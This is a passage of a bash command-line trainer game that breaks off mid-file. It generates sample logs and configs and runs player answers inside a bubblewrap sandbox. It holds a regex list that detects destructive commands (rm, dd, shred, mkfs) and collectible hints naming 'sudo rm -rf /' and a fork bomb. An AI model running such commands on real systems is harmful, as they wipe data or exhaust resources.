cmdchamp

#!/usr/bin/env bash
# cmdchamp — CLI trainer (single file, no deps beyond bash 4.3+ / bwrap)
#
# FILE MAP (search for ═══ SECTION ═══ markers):
#   INIT .............. bash check, XDG, colors, constants
#   PROFILE ........... load/save, first run, intro, tutorial
#   BOSSES & LEVELS ... name arrays, scenario metadata
#   SANDBOX ........... file generators, bwrap exec, state checks
#   SESSION ........... cleanup trap, stty restore, session summary
#   FLOPPY DISKS ...... 8 hidden collectibles
#   VARIABLE POOLS .... randomization data (logs, configs, IPs, etc.)
#   HELPERS ........... _fpick, _frnum, _ctx, _QV
#   MANPAGES & EXP .... inline manpage data, explain() renderer
#   QUESTION DSL ...... _qparse, format docs
#   LEVEL GENERATORS .. gen_level1–30 (question content)
#   SCENARIOS ......... 8 sc_setup/sc_steps functions
#   ANSWER CHECK ...... _fnorm, check, load/save
#   SCORING & UI ...... _hash, norm, stats, hdr, qdisp, draw
#   VI HANDLER ........ _vi_normal, _read_line (shared input)
#   SCORING ENGINE .... _sset, _sflush, _sget, decay, _mode_init
#   RUN ENGINE ........ run(), _run_loop
#   POST-ROOT ......... challenge, scenario, placement
#   SCENARIO ENGINE ... scenario(), snapshot/rollback
#   SELFTEST .......... _selftest (unit tests)
#   PLACEMENT ......... place() (skip-ahead test)
#   CLI ENTRYPOINT .... arg parsing, dispatch
# ═══ INIT ═══
set -uo pipefail
[[ ${BASH_VERSINFO[0]:-0} -lt 4 || (${BASH_VERSINFO[0]} -eq 4 && ${BASH_VERSINFO[1]:-0} -lt 3) ]] && { echo "Requires bash 4.3+"; exit 1; }
_tty() { [[ -t 0 ]] || { echo "Error: requires interactive terminal" >&2; exit 1; }; }
command -v awk &>/dev/null || { echo "Error: awk not found" >&2; exit 1; }

DATA="${XDG_DATA_HOME:-$HOME/.local/share}/cmdchamp"; mkdir -p "$DATA"; touch "$DATA/scores"

R=$'\e[31m' G=$'\e[32m' Y=$'\e[33m' U=$'\e[1;34m' M=$'\e[35m' C=$'\e[36m' W=$'\e[37m' B=$'\e[1m' N=$'\e[0m' D=$'\e[2m'
_SY=$'\e[?2026h' _SN=$'\e[?2026l'

_trim() { REPLY="${1#"${1%%[![:space:]]*}"}"; REPLY="${REPLY%"${REPLY##*[![:space:]]}"}"; }
_csv_count() { [[ -z "$1" ]] && { REPLY=0; return; }; IFS=',' read -ra _cca <<< "$1"; REPLY=${#_cca[@]}; }

_strip_ansi() {
  local s="$1" out="" i=0 ch
  while ((i < ${#s})); do
    ch="${s:i:1}"
    if [[ "$ch" == $'\e' ]]; then
      ((i++))
      if ((i < ${#s})) && [[ "${s:i:1}" == "[" ]]; then
        ((i++))
        while ((i < ${#s})) && [[ ! "${s:i:1}" =~ [a-zA-Z] ]]; do ((i++)); done
        ((i < ${#s})) && ((i++))
      fi
    else out+="$ch"; ((i++)); fi
  done
  REPLY="$out"
}

VERSION="1.1.0"
SANDBOX_TIMEOUT=5      # Seconds before sandbox command times out
BOSS_THRESHOLD=4       # Correct answers needed to beat boss (out of BOSS_TOTAL)
BOSS_TOTAL=5           # Number of questions in boss round
FIRE_STREAK=5          # Streak needed for fire mode (+2 points)
MIX_PER_LEVEL=2        # Questions to auto-mix from each previous level
MAX_LEVEL=30           # Highest level number
BOSS_TIMER=15          # Seconds per boss question
_DECAY_T2=2592000     # 30 days: mastered → learning
_DECAY_T1=1209600     # 14 days: learning → unseen
_DECAY_INTERVAL=86400  # only run decay once per 24h

# ═══ PROFILE ═══
PLAYER_NAME="" BOSS_BEATEN=0 BEST_CHALLENGE=0 DISKS_FOUND="" SC_DONE=""
OPT_VI=1 OPT_SOUND=1 OPT_ALTS=1
_PROFILE_VER=5  # bump this when profile format changes; old profiles get reset
LAST_DECAY=0  # epoch of last decay check (persisted in profile)
PLACED_THROUGH=0  # highest level passed via placement test

_load_profile() {
  if [[ -f "$DATA/profile" ]]; then
    local _file_ver=0
    while IFS='=' read -r key val; do
      [[ "$key" =~ ^[A-Z_]+$ ]] || continue
      case "$key" in
        PLAYER_NAME) PLAYER_NAME="$val";;
        BOSS_BEATEN) BOSS_BEATEN="$val";;
        BEST_CHALLENGE|BEST_GAUNTLET) BEST_CHALLENGE="$val";;
        DISKS_FOUND|EGGS_FOUND) DISKS_FOUND="$val";;
        SC_DONE) SC_DONE="$val";;
        LAST_DECAY) LAST_DECAY="$val";;
        OPT_VI) OPT_VI="$val";;
        OPT_SOUND) OPT_SOUND="$val";;
        OPT_ALTS) OPT_ALTS="$val";;
        PLACED_THROUGH) PLACED_THROUGH="$val";;
        PROFILE_VER) _file_ver="$val";;
      esac
    done < "$DATA/profile"
    if ((_file_ver == 2 || _file_ver == 3)); then
      # v2→v4, v3→v4: add option fields, migrate in place
      _save_profile
    elif ((_file_ver != _PROFILE_VER)); then
      [[ -f "$DATA/profile" ]] && cp "$DATA/profile" "$DATA/profile.bak"
      [[ -f "$DATA/scores" ]] && cp "$DATA/scores" "$DATA/scores.bak"
      printf '%s\n' "Profile version mismatch (got $_file_ver, want $_PROFILE_VER) — reset. Backup in profile.bak/scores.bak"
      PLAYER_NAME="" BOSS_BEATEN=0 BEST_CHALLENGE=0 DISKS_FOUND="" SC_DONE=""
      : > "$DATA/scores"
      rm -f "$DATA"/*.json
    fi
    [[ "$BOSS_BEATEN" =~ ^[0-9]+$ ]] || BOSS_BEATEN=0
    ((BOSS_BEATEN > MAX_LEVEL)) && BOSS_BEATEN=$MAX_LEVEL
    [[ "$BEST_CHALLENGE" =~ ^[0-9]+$ ]] || BEST_CHALLENGE=0
  fi
}

_save_profile() {
  printf 'PLAYER_NAME=%s\nBOSS_BEATEN=%d\nBEST_CHALLENGE=%d\nDISKS_FOUND=%s\nSC_DONE=%s\nLAST_DECAY=%d\nOPT_VI=%d\nOPT_SOUND=%d\nOPT_ALTS=%d\nPLACED_THROUGH=%d\nPROFILE_VER=%d\n' \
    "$PLAYER_NAME" "$BOSS_BEATEN" "$BEST_CHALLENGE" "$DISKS_FOUND" "$SC_DONE" "$LAST_DECAY" "$OPT_VI" "$OPT_SOUND" "$OPT_ALTS" "$PLACED_THROUGH" "$_PROFILE_VER" > "$DATA/profile.tmp"
  mv "$DATA/profile.tmp" "$DATA/profile"
}

_first_run() {
  printf '%s\e[2J\e[H%s' "$_SY" "$_SN"
  echo
  read -rp "  Enter your handle: " PLAYER_NAME
  _strip_ansi "$PLAYER_NAME"; PLAYER_NAME="$REPLY"
  PLAYER_NAME="${PLAYER_NAME//$'\n'/}"            # strip newlines
  PLAYER_NAME="${PLAYER_NAME//$'\r'/}"            # strip carriage returns
  PLAYER_NAME="${PLAYER_NAME:0:20}"              # truncate to 20 chars
  [[ -z "$PLAYER_NAME" ]] && PLAYER_NAME="anon"
  BOSS_BEATEN=0
  _save_profile
  _intro
  _tutorial
  place
}

_intro() {
  printf '%s\e[2J\e[H%s' "$_SY" "$_SN"
  local pad=$((25 - ${#PLAYER_NAME})); ((pad < 0)) && pad=0
  local spaces; printf -v spaces '%*s' "$pad" ''
  cat <<EOF

    ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
    ░░                                                                  ░░
    ░░      The networks are dead. The sky is ash.                      ░░
    ░░      What remains runs on bone and silicon.                      ░░
    ░░                                                                  ░░
    ░░      You are ${W}${B}${PLAYER_NAME}${N}. You have only your shell.${spaces}░░
    ░░                                                                  ░░
    ░░      30 daemons guard the descent to ROOT.                       ░░
    ░░                                                                  ░░
    ░░      ${D}Know the words, or be forgotten.${N}                            ░░
    ░░                                                                  ░░
    ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░

EOF
  [[ "${1:-}" == nopause ]] && return
  read -rsp "                            Press Enter to continue..."
  echo
}

_tutorial() {
  printf '%s\e[2J\e[H\n%s' "$_SY" "$_SN"
  cat <<EOF
    ${U}Controls${N}
    ${C}Tab${N}   Manpage   ${C}Enter${N}  Submit   ${C}Ctrl+d${N}  Quit

    ${U}Vi Mode${N} ${D}(toggle in Options)${N}
    ${C}Esc${N}   Normal mode        ${C}i a${N}   Insert mode
    ${C}h l${N}   Move cursor        ${C}w b${N}   Word jump
    ${C}d${N}w ${C}c${N}w  Delete/change word  ${C}?${N}     Full vi help

EOF
  read -rsp "    Press Enter to continue..."
  echo
}

# ═══ BOSSES & LEVELS ═══
BOSS_NAMES=("" "n00b" "CopyPasta" "Clobber" "CatMan" "PipeWrench" "Murmur" "DevNull" "AndOr" "\$VARIABLE" "\$\$"
  "BackgroundNoise" "TestCase" "Gatekeeper" "Daemon" "Mux" "Needle" "Globber" "Sieve" "ArrayLord" "TheFork"
  "Swarm" "Regex" "Rebase" "Netcat" "TheFirewall" "Spectrum" "Collision" "Void" "SUID" "ROOT")
BOSS_FLAVOR=("" "There is no shortcut. Only the first step." "Every copy is a ghost of the original." "What you saved, I devour."
  "I read the bones of dead files." "Data is blood. I am the vein." "I feed the silence into your commands."
  "Your stderr falls into the void." "True or false. Live or die." "I hold what you've forgotten."
  "Every process has a death." "I wait in the dark between processes." "Pass my test or be terminated."
  "Every door has a lock. I hold the modes." "I run while you sleep forever." "One terminal. Infinite cages."
  "I see every line. Nothing hides from me." "I match everything. I consume all." "What passes through me is all that remains."
  "Count from zero. End at null." "Every path diverges. None return." "A thousand commands. One directive."
  "I see patterns in your ashes." "Your history is mine to rewrite." "I listen where you cannot see."
  "Nothing enters. Nothing leaves." "Every frequency bleeds secrets." "Your hashes are already broken."
  "I am where data goes to die." "I wear the mask of root." "I am ROOT. Bow or break.")
LEVEL_NAMES=("" "First Steps" "File Basics" "Save Your Work" "Reading Files" "Basic Pipes"
  "Input & Here-Strings" "Error Handling" "Logic Gates" "Variables" "Special Variables" "Job Control"
  "Test Conditions" "Core File Tools" "System Admin" "Multiplexers" "Text Search"
  "File Finding" "Data Processing" "String & Arrays" "Control Flow" "Batch Ops"
  "Advanced Regex" "Git" "Network Tools" "Network Scanning" "WiFi & RF"
  "Hash Cracking" "Forensics" "Privilege Escalation" "ROOT")

SC_TOTAL=8
SC_NAMES=("" "Permission Lockout" "Archive & Extract" "Find the Needle" "Messy CSV"
  "The Incident" "The Broken Deploy" "Log Emergency" "Config Surgery")
SC_UNLOCK=("" 13 13 16 18 18 21 21 21)  # boss level needed to unlock each scenario
SC_FLAVOR=(""
  "Everything is locked down. Restore access."
  "Package it up, ship it out, bring it back."
  "Hidden markers are buried in the codebase. Hunt them down."
  "Someone dumped messy data. Clean it up."
  "An attacker hit the server. Investigate the breach."
  "The deploy pipeline is broken. Find the problems and fix them."
  "The logs are screaming. Triage the errors before it gets worse."
  "The config file is a mess. Perform surgery.")

_victory() {
  printf '%s\e[2J\e[H' "$_SY"
  local -A sc; [[ -f "$DATA/scores" ]] && while IFS='|' read -r k v; do [[ "$k" == "#"* ]] && continue; sc[$k]=$v; done < "$DATA/scores"
  local total=0 mastered=0
  for k in "${!sc[@]}"; do
    ((++total))
    local _tier="${sc[$k]%%|*}"
    [[ "$_tier" != "0" && "$_tier" != "1" ]] && ((++mastered))
  done
  local s
  cat <<'EOF'

    ██████╗  ██████╗  ██████╗ ████████╗
    ██╔══██╗██╔═══██╗██╔═══██╗╚══██╔══╝
    ██████╔╝██║   ██║██║   ██║   ██║
    ██╔══██╗██║   ██║██║   ██║   ██║
    ██║  ██║╚██████╔╝╚██████╔╝   ██║
    ╚═╝  ╚═╝ ╚═════╝  ╚═════╝    ╚═╝

EOF
  printf -v s '%*s' $(( (70 - 20 - ${#PLAYER_NAME}) / 2 )) ''
  printf '%s%s\n\n' "$s" "${G}${B}ACCESS GRANTED: ${W}${PLAYER_NAME}${N}"
  local stat_text pad_len stat_pad
  printf -v stat_text '%s prompts seen. %s mastered.' "$total" "$mastered"
  pad_len=$((56 - ${#stat_text}))
  printf -v stat_pad '%*s' "$pad_len" ''
  local br="${D}░░${N}" edge="${D}░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░${N}"
  printf '\n'
  printf '    %s\n' "$edge"
  printf '    %s                                                              %s\n' "$br" "$br"
  printf '    %s      The daemons are silent. The descent is complete.        %s\n' "$br" "$br"
  printf '    %s      What remains bends to your command.                     %s\n' "$br" "$br"
  printf '    %s                                                              %s\n' "$br" "$br"
  printf '    %s      30 bosses defeated. The shell is yours.                 %s\n' "$br" "$br"
  printf '    %s      %s%s%s\n' "$br" "$stat_text" "$stat_pad" "$br"
  printf '    %s                                                              %s\n' "$br" "$br"
  printf '    %s                      %sYou are ROOT.%s                           %s\n' "$br" "${B}" "${N}" "$br"
  printf '    %s                                                              %s\n' "$br" "$br"
  printf '    %s\n' "$edge"
  echo
  printf '%s' "$_SN"
  [[ "${1:-}" == nopause ]] && return
  read -rsp "                          Press Enter to exit..."
  echo
}

_boss_splash() {
  local lv=$1
  local boss="${BOSS_NAMES[$lv]}"
  local flavor="${BOSS_FLAVOR[$lv]}"
  printf '%s\e[2J\e[H\n\n' "$_SY"
  local s info
  printf -v s '%*s' $(( (80 - 12) / 2 )) ''
  printf '%s%s\n\n' "$s" "${M}${B}═══ BOSS ═══${N}"
  printf -v s '%*s' $(( (80 - ${#boss}) / 2 )) ''
  printf '%s%s\n\n' "$s" "${M}${B}${boss}${N}"
  printf -v s '%*s' $(( (80 - ${#flavor} - 2) / 2 )) ''
  printf '%s%s\n\n' "$s" "${D}\"${flavor}\"${N}"
  printf -v info 'No manpages. %d/%d to pass.' "$BOSS_THRESHOLD" "$BOSS_TOTAL"
  printf -v s '%*s' $(( (80 - ${#info}) / 2 )) ''
  printf '%s%s\n' "$s" "${D}${info}${N}"
  echo
  printf '%s' "$_SN"
  printf -v s '%*s' $(( (80 - 26) / 2 )) ''
  read -rsp "${s}Press Enter to continue..."
  echo
}

# ═══ SANDBOX ═══
SANDBOX_MODE=1  # ON by default
SANDBOX_PRISTINE="$DATA/sandbox.pristine"
SANDBOX_DIR="$DATA/sandbox"

_check_bwrap() {
  command -v bwrap &>/dev/null || {
    printf '%s\n' "${R}Error: bubblewrap (bwrap) not installed${N}" >&2
    echo "Install: paru -S bubblewrap" >&2
    SANDBOX_MODE=0
    return 1
  }
}

# shellcheck disable=SC2034  # locals used via _fpick nameref
_gen_log() {
  local f="$1" lines="${2:-50}"
  local ips=("192.168.1.100" "10.0.0.5" "172.16.0.50" "192.168.8.1" "10.10.10.10")
  local codes=("200" "200" "200" "200" "301" "304" "400" "403" "404" "500")
  local methods=("GET" "GET" "GET" "POST" "PUT" "DELETE")
  local paths=("/" "/index.html" "/api/users" "/api/data" "/login" "/static/style.css" "/favicon.ico" "/admin" "/search" "/api/v1/status")
  local agents=("Mozilla/5.0" "curl/7.68" "wget" "Python-requests" "Go-http-client")
  local now; printf -v now '%(%s)T' -1
  local step=$((86400 / lines))
  : > "$f"
  for ((i=0; i<lines; i++)); do
    _fpick ips; local ip=$REPLY; _fpick codes; local code=$REPLY
    _fpick methods; local method=$REPLY; _fpick paths; local path=$REPLY
    _fpick agents; local agent=$REPLY; local size=$((RANDOM % 50000 + 100))
    local ts; printf -v ts '%(%d/%b/%Y:%H:%M:%S +0000)T' "$((now - (lines - i) * step + RANDOM % step))"
    printf '%s - - [%s] "%s %s HTTP/1.1" %s %d "%s"\n' "$ip" "$ts" "$method" "$path" "$code" "$size" "$agent"
  done >> "$f"
}

# shellcheck disable=SC2034  # locals used via _fpick nameref
_gen_app_log() {
  local f="$1" lines="${2:-40}"
  local levels=("INFO" "INFO" "INFO" "INFO" "WARN" "WARN" "ERROR" "DEBUG")
  local msgs_info=("Request processed" "User logged in" "Cache hit" "Connection established" "Task completed" "Session started")
  local msgs_warn=("Slow query detected" "Memory usage high" "Rate limit approaching" "Deprecated API used" "Retry attempt")
  local msgs_error=("Connection refused" "Timeout exceeded" "Invalid request" "Permission denied" "Database error" "Null pointer")
  local now; printf -v now '%(%s)T' -1
  local step=$((86400 / lines))
  : > "$f"
  # Guarantee at least one of each level in first 4 lines
  local forced=("INFO" "WARN" "ERROR" "DEBUG")
  for ((i=0; i<lines; i++)); do
    local level
    if ((i < 4)); then level=${forced[$i]}; else _fpick levels; level=$REPLY; fi
    local ts; printf -v ts '%(%Y-%m-%d %H:%M:%S)T' "$((now - (lines - i) * step + RANDOM % step))"
    local msg
    case "$level" in
      INFO|DEBUG) _fpick msgs_info; msg=$REPLY;;
      WARN) _fpick msgs_warn; msg=$REPLY;;
      ERROR) _fpick msgs_error; msg=$REPLY;;
    esac
    printf '[%s] %s: %s\n' "$ts" "$level" "$msg"
  done >> "$f"
}

# shellcheck disable=SC2034  # locals used via _fpick nameref
_gen_csv() {
  local f="$1" rows="${2:-30}"
  local names=("Alice" "Bob" "Charlie" "Diana" "Eve" "Frank" "Grace" "Henry" "Ivy" "Jack")
  local domains=("example.com" "test.org" "demo.net" "sample.io")
  local statuses=("active" "active" "active" "inactive" "pending")
  local now; printf -v now '%(%s)T' -1
  echo "id,name,email,status,timestamp" > "$f"
  for ((i=1; i<=rows; i++)); do
    _fpick names; local name=$REPLY; _fpick domains; local domain=$REPLY
    _fpick statuses; local status=$REPLY
    local ts; printf -v ts '%(%Y-%m-%d)T' "$((now - RANDOM % 2592000))"
    printf '%d,%s,%s@%s,%s,%s\n' "$i" "$name" "${name,,}" "$domain" "$status" "$ts"
  done >> "$f"
}

_gen_ini() {
  printf '%s\n' '[server]' 'host = 0.0.0.0' 'port = 8080' 'workers = 4' 'timeout = 30' '' \
    '[database]' 'type = postgresql' 'host = localhost' 'port = 5432' 'name = appdb' 'user = admin' '' \
    '[logging]' 'level = info' 'file = /var/log/app.log' 'rotate = daily' '' \
    '[cache]' 'enabled = true' 'ttl = 3600' 'backend = redis' > "$1"
}

_gen_yaml() {
  printf '%s\n' 'server:' '  host: 0.0.0.0' '  port: 8080' '  workers: 4' '  ssl:' \
    '    enabled: false' '    cert: /etc/ssl/cert.pem' '' 'database:' '  primary:' \
    '    host: localhost' '    port: 5432' '    name: appdb' '  replica:' \
    '    host: replica.local' '    port: 5432' '' 'logging:' '  level: info' '  outputs:' \
    '    - stdout' '    - file:/var/log/app.log' '' 'features:' '  cache: true' \
    '  metrics: true' '  debug: false' > "$1"
}

_gen_txt() {
  printf '%s\n' 'Meeting Notes - Project Review' '==============================' '' \
    'Attendees: Alice, Bob, Charlie' '' 'Action Items:' '1. Update documentation' \
    '2. Fix authentication bug' '3. Deploy to staging' '4. Review security patches' '' \
    'Discussion Points:' '- Performance improvements needed' '- New feature requests from users' \
    '- Timeline for next release' '' 'TODO: Schedule follow-up meeting' \
    'TODO: Review pull requests' 'TODO: Update dependencies' '' 'Notes:' \
    'The deployment went smoothly.' 'Minor issues with caching fixed.' \
    'Need to monitor error rates.' '' 'Completed tasks:' '- Database migration' \
    '- API versioning' '- Load testing' > "$1"
}

# shellcheck disable=SC2034  # locals used via _fpick nameref
_gen_users_csv() {
  local f="$1" rows="${2:-20}"
  local fnames=("john" "jane" "mike" "sarah" "tom" "lisa" "david" "emma" "alex" "olivia")
  local lnames=("smith" "jones" "wilson" "brown" "taylor" "davis" "miller" "garcia" "martinez" "lee")
  local roles=("admin" "user" "user" "user" "moderator" "guest")
  local now; printf -v now '%(%s)T' -1
  echo "username,fullname,role,created,logins" > "$f"
  for ((i=1; i<=rows; i++)); do
    _fpick fnames; local fn=$REPLY; _fpick lnames; local ln=$REPLY
    _fpick roles; local role=$REPLY; local logins=$((RANDOM % 500))
    local ts; printf -v ts '%(%Y-%m-%d)T' "$((now - RANDOM % 31536000))"
    printf '%s_%s,%s %s,%s,%s,%d\n' "$fn" "$ln" "${fn^}" "${ln^}" "$role" "$ts" "$logins"
  done >> "$f"
}

_gen_json() {
  printf '%s\n' '{' '  "version": "1.0.0",' '  "data": [' \
    '    {"id": 1, "name": "Item One", "status": "active", "count": 42},' \
    '    {"id": 2, "name": "Item Two", "status": "pending", "count": 17},' \
    '    {"id": 3, "name": "Item Three", "status": "active", "count": 89},' \
    '    {"id": 4, "name": "Item Four", "status": "inactive", "count": 5}' \
    '  ],' '  "metadata": {' '    "total": 4,' '    "generated": "2024-01-15"' '  }' '}' > "$1"
}

_gen_sandbox_files() {
  local dir="$1"
  mkdir -p "$dir"/{src/test,logs,data,backup,temp,config,test}

  _gen_log "$dir/server.log" 50
  _gen_app_log "$dir/app.log" 40
  _gen_csv "$dir/data.csv" 30
  _gen_users_csv "$dir/users.csv" 20
  _gen_ini "$dir/config.ini"
  _gen_yaml "$dir/settings.yaml"
  _gen_txt "$dir/notes.txt"
  printf '%s\n' 'Task List' '=========' '' '[ ] Review PR #123' '[ ] Update API docs' \
    '[ ] Fix login timeout' '[x] Deploy v2.1.0' '[x] Merge feature branch' \
    '[ ] Refactor user service' '[ ] Add unit tests' '[ ] Setup CI pipeline' > "$dir/todo.txt"
  _gen_json "$dir/data/export.json"

  _gen_log "$dir/logs/access.log" 30
  _gen_app_log "$dir/logs/error.log" 20

  printf '%s\n' '#!/bin/bash' 'echo "Backup started at $(date)"' 'echo "Backing up files..."' 'echo "Backup complete!"' > "$dir/backup.sh"
  chmod +x "$dir/backup.sh"
  printf '%s\n' '#!/bin/bash' 'echo "Deploying application..."' "echo \"Version: \$(cat VERSION 2>/dev/null || echo 'unknown')\"" 'echo "Deploy complete!"' > "$dir/deploy.sh"
  chmod +x "$dir/deploy.sh"

  printf '%s\n' '#!/usr/bin/env python3' '"""Main application module."""' '' \
    'def main():' '    print("Hello, World!")' '    return 0' '' \
    'if __name__ == "__main__":' '    main()' > "$dir/main.py"
  printf '%s\n' '"""Utility functions."""' '' 'def helper(x):' '    return x * 2' '' \
    'def process(data):' '    return [helper(item) for item in data]' > "$dir/src/utils.py"
  printf '%s\n' '"""Tests for utils module."""' 'import unittest' '' \
    'class TestUtils(unittest.TestCase):' '    def test_helper(self):' \
    '        self.assertEqual(helper(2), 4)' '' 'if __name__ == "__main__":' \
    '    unittest.main()' > "$dir/src/test/test_utils.py"
}

_sandbox_init() {
  ((SANDBOX_MODE)) || return 0
  _check_bwrap || return 1
  # Check available disk space (need at least 10MB)
  local _avail; _avail=$(df -k "${DATA%/*}" 2>/dev/null | awk 'NR==2{print $4}')
  if [[ -n "$_avail" ]] && ((_avail < 10240)); then
    printf '%s\n' "${Y}Warning: low disk space, sandbox disabled${N}" >&2
    SANDBOX_MODE=0; return 1
  fi
  if [[ ! -d "$SANDBOX_PRISTINE" ]]; then
    _gen_sandbox_files "$SANDBOX_PRISTINE"
  fi
  _sandbox_reset
}

_sandbox_reset() {
  ((SANDBOX_MODE)) || return 0
  [[ -d "$SANDBOX_PRISTINE" ]] || return 1
  chmod -R u+rwX "$SANDBOX_DIR" 2>/dev/null  # unlock any restricted dirs (e.g. scenario 4)
  local _sb_tmp; _sb_tmp=$(mktemp -d "${SANDBOX_DIR}.XXXXXX") || { SANDBOX_MODE=0; return 1; }
  rm -rf "$_sb_tmp"
  if ! cp -a "$SANDBOX_PRISTINE" "$_sb_tmp"; then
    rm -rf "$_sb_tmp"
    printf '%s\n' "${Y}Warning: sandbox reset failed, disabling${N}" >&2
    SANDBOX_MODE=0; return 1
  fi
  rm -rf "$SANDBOX_DIR"
  mv "$_sb_tmp" "$SANDBOX_DIR"
}

_sandbox_exec() {
  local cmd="$1" timeout_sec="${2:-$SANDBOX_TIMEOUT}"
  ((SANDBOX_MODE)) || return 1
  local -a bwrap_args=(
    --ro-bind /usr /usr
    --ro-bind /bin /bin
    --ro-bind /etc/passwd /etc/passwd
    --ro-bind /etc/group /etc/group
    --bind "$SANDBOX_DIR" /sandbox
    --chdir /sandbox
    --setenv HOME /sandbox
    --setenv USER sandbox
    --unshare-all
    --die-with-parent
    --new-session
    --dev /dev
    --tmpfs /tmp:size=64M
  )
  [[ -e /lib ]] && bwrap_args+=(--ro-bind /lib /lib)
  [[ -e /lib64 ]] && bwrap_args+=(--ro-bind /lib64 /lib64)

  local _rc
  timeout "$timeout_sec" bwrap "${bwrap_args[@]}" /bin/bash -c 'eval "$1"' -- "$cmd"; _rc=$?
  ((_rc >= 125)) && printf '%s\n' "${R}sandbox error (exit ${_rc})${N}" >&2
  return "$_rc"
}

_SANDBOX_DESTRUCTIVE=0
_is_destructive() {
  local cmd="$1"
  [[ "$cmd" =~ (^|[[:space:];&|])(rm|mv|cp|dd|truncate|shred|unlink|tee|chmod|chown|mkfs|fdisk|parted|install|split|patch|ln|mkdir|touch)[[:space:]] ]] && return 0
  [[ "$cmd" =~ [^0-9](\>\>|\>[^>])|^(\>\>|\>[^>]) ]] && return 0
  [[ "$cmd" =~ sed[[:space:]]+(-i|--in-place) ]] && return 0
  [[ "$cmd" =~ :[[:space:]]*\> ]] && return 0
  [[ "$cmd" =~ find[[:space:]].*-delete ]] && return 0
  [[ "$cmd" =~ rsync[[:space:]].*--delete|xargs[[:space:]].*(rm|mv)|find[[:space:]].*-exec[[:space:]].*(rm|mv) ]] && return 0
  [[ "$cmd" =~ (^|[[:space:];&|])(eval|exec|source)[[:space:]] ]] && return 0
  [[ "$cmd" =~ \&\> ]] && return 0
  return 1
}

# Returns 0 if output matches expected
# Formats:
#   exact text - exact match
#   ~regex     - regex match
#   @N         - line count match
#   *          - any output (just check command ran)
_sandbox_check_output() {
  local actual="$1" expected="$2"
  [[ -z "$expected" ]] && return 1

  case "$expected" in
    \~*)  # Regex match
      local pattern="${expected:1}"
      [[ "$actual" =~ $pattern ]] && return 0
      ;;
    @*)   # Line count match
      local count="${expected:1}"
      local lines=0
      if [[ -n "$actual" ]]; then
        actual="${actual%$'\n'}"
        local _lc="${actual//[!$'\n']/}"; lines=$(( ${#_lc} + 1 ))
      fi
      ((lines == count)) && return 0
      ;;
    \*)   # Any output
      [[ -n "$actual" ]] && return 0
      ;;
    *)    # Exact match (trimmed)
      _trim "$actual"; actual=$REPLY
      _trim "$expected"; expected=$REPLY
      [[ "$actual" == "$expected" ]] && return 0
      ;;
  esac
  return 1
}

# Formats: exists:F, !exists:F, contains:F:S, !contains:F:S, lines:F:N, line1:F:T, perm:F:M
_sandbox_check_state() {
  local checks="$1" checks_arr=()
  # Split on commas only when followed by a check keyword (avoids breaking values with commas)
  local _rem="$checks" _seg
  while [[ -n "$_rem" ]]; do
    if [[ "$_rem" =~ ^((!?(exists|contains|lines|line1|perm)):[^,]*),((!?(exists|contains|lines|line1|perm)):) ]]; then
      _seg="${BASH_REMATCH[1]}"
      _rem="${_rem:${#_seg}+1}"
    else _seg="$_rem"; _rem=""; fi
    checks_arr+=("$_seg")
  done
  for check in "${checks_arr[@]}"; do
    case "$check" in
      exists:*|!exists:*)
        local _neg=0; [[ "$check" == !* ]] && { _neg=1; check="${check:1}"; }
        local file="${check#exists:}"
        ((_neg)) && { [[ ! -e "$SANDBOX_DIR/$file" ]] || return 1; } || { [[ -e "$SANDBOX_DIR/$file" ]] || return 1; }
        ;;
      contains:*:*|!contains:*:*)
        local _neg=0; [[ "$check" == !* ]] && { _neg=1; check="${check:1}"; }
        local rest="${check#contains:}"; local file="${rest%%:*}" pattern="${rest#*:}"
        if ((_neg)); then grep -qF "$pattern" -- "$SANDBOX_DIR/$file" 2>/dev/null && return 1
        else grep -qF "$pattern" -- "$SANDBOX_DIR/$file" 2>/dev/null || return 1; fi
        ;;
      lines:*:*)
        local rest="${check#lines:}"; local file="${rest%%:*}" count="${rest#*:}"
        [[ -f "$SANDBOX_DIR/$file" ]] || { ((count == 0)) && continue || return 1; }
        local actual; actual=$(wc -l < "$SANDBOX_DIR/$file" 2>/dev/null)
        ((actual == count)) || return 1
        ;;
      line1:*:*)
        local rest="${check#line1:}"; local file="${rest%%:*}" text="${rest#*:}"
        local first; read -r first < "$SANDBOX_DIR/$file" 2>/dev/null || return 1
        [[ "$first" == *"$text"* ]] || return 1
        ;;
      perm:*:*|!perm:*:*)
        local _neg=0; [[ "$check" == !* ]] && { _neg=1; check="${check:1}"; }
        local rest="${check#perm:}"; local file="${rest%%:*}" perms="${rest#*:}"
        local path="$SANDBOX_DIR/$file"
        [[ ! -e "$path" ]] && { ((_neg)) && continue || return 1; }
        local _p; for ((_p=0; _p<${#perms}; _p++)); do
          test -"${perms:$_p:1}" "$path"; local _prc=$?; ((_neg ? !_prc : _prc)) && return 1; done
        ;;
    esac
  done
  return 0
}
# ═══ SESSION ═══
_stty_saved=$(stty -g 2>/dev/null) || _stty_saved=""
_interactive=0 _CLEANING=0
_cleanup() {
  ((_CLEANING)) && return; _CLEANING=1
  _sflush_if_dirty 2>/dev/null
  [[ -n "$_stty_saved" ]] && stty "$_stty_saved" 2>/dev/null
  ((_interactive)) || return 0
  rm -rf "$DATA/sandbox.snap" "$DATA/sandbox.snap.perms" 2>/dev/null
  printf '\e[?25h'
  if ((_S_ANSWERED > 0)); then
    local _ts; printf -v _ts '%(%s)T' -1; local el=$((_ts - _S_START))
    printf '\n%s  %s/%s (%d%%)  streak %s  %dm%ds\n' \
      "${U}Session${N}" "${G}${_S_CORRECT}${N}" "${_S_ANSWERED}" \
      $((_S_CORRECT*100/_S_ANSWERED)) "${W}${_S_BEST_STREAK}${N}" \
      $((el/60)) $((el%60))
  else echo; fi
}
trap '_cleanup; exit 0' INT TERM HUP EXIT
((EUID == 0)) && PROMPT_CHAR='# ' || PROMPT_CHAR='$ '
PROMPT_CHAR="${CMD_PROMPT:-$PROMPT_CHAR}"

# ═══ FLOPPY DISKS ═══
_DISK_TOTAL=8
declare -A _DISK_DESC=(
  [sudorm]="Answer sudo rm -rf /"
  [forkbomb]="Answer a fork bomb"
  [rtfm]="Answer just 'man' with no arguments"
  [streak10]="Get a 10+ answer streak"
  [nightowl]="Play between midnight and 4am"
